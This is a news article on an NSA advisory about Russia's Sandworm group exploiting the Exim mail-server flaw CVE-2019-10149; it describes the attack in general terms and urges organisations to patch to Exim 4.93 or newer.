The US National Security Agency (NSA) has released a new alert warning that Russian state hackers have been exploiting a vulnerability in Exim email servers for over nine months.
Exim is mail transfer agent (MTA) software developed by the University of Cambridge which is used on Unix-based operating systems. Bundled with many popular Linus distributions like Red Hat and Debian, it’s thought to run on millions of email servers globally.
However, the NSA warned that organizations which have failed to patch CVE-2019-10149, which was fixed in June 2019, may be at risk of attack from the infamous Sandworm group.
“The actors exploited victims using Exim software on their public facing MTAs by sending a command in the ‘MAIL FROM’ field of an SMTP (Simple Mail Transfer Protocol) message,” the advisory stated.
“An unauthenticated remote attacker can send a specially crafted email to execute commands with root privileges allowing the attacker to install programs, modify data, and create new accounts.”
Specifically, when CVE-2019-10149 is exploited by Sandworm, the targeted machine downloads and executes and shell script from a domain under the group’s control. This script will in turn attempt to: add privileged users, disable network security settings, update SSH configuration to enable additional remote access and execute an additional script to enable follow-on exploitation.
The NSA urged organizations to upgrade their Exim installations to 4.93 or newer, and use network-based security appliances to detect and/or block CVE-2019-10149 exploit attempts.
Staffed by operatives from the Russian GRU (military intelligence) Main Center for Special Technologies (GTsST), field post number 74455, Sandworm is known to be one of the most sophisticated state hacking outfits around.
It has been widely linked to the BlackEnergy malware used in attacks on Ukrainian power stations in 2015 and 2016, which caused major outages during winter, as well as campaigns against NATO members and European governments in 2019.